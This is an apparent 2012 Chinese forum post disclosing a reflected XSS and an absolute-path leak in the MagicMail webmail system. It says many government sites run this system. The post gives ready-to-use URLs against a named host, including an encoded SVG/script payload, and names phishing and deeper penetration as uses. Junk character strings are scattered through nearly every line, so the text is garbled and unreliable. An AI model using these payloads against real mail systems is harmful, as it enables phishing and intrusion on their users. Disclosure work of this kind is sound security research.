今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
2 J# r8 s/ F: \4 B% k3 W- C# W) v7 o4 v/ z3 O
3 `' [) n( s7 x, V8 Q1 d5 B% w包含 一个反射性XSS 以及 绝对路径泄漏
* h) w0 x R0 k, m* x' Q看了看 貌似全部是linux的。
+ q( [- u8 R c; m. V
+ \ {: i3 G9 r. Y1 K2 z$ c关键字:迈捷邮件系统 by MagicMail0 D8 P* |- g; V) q P
% f' Y7 E/ X4 J: w5 V4 |
可以看到很多政府网站都用这个邮件系统5 n. c1 M2 R: m8 V( F1 z
9 J- R: w9 E5 |* D+ D4 n' W绝对路径 http://madman.in/index.php?login_type=declare&language=
6 L! ]9 q( {& _: C' L8 |% b# Q" k+ {9 H3 T1 N$ J- a
0 v' W; R- ?6 \# p
" [( Y# `* |8 K% gXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E3 f# i& e1 i% ^5 L3 ~
0 B7 @3 m8 B) c" ?
9 Z) J( d+ Q+ K6 E0 c9 o
- Q, X1 b: C$ ?) q- C2 r虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
) U7 d) Q3 J( D9 o+ ?' f! r+ y $ t! e" y4 G% }) f- u
修复方案:看官方补丁吧。4 t3 K1 t' n% f- k
|
发表于 2012-11-9 20:38:41
收藏
支持
反对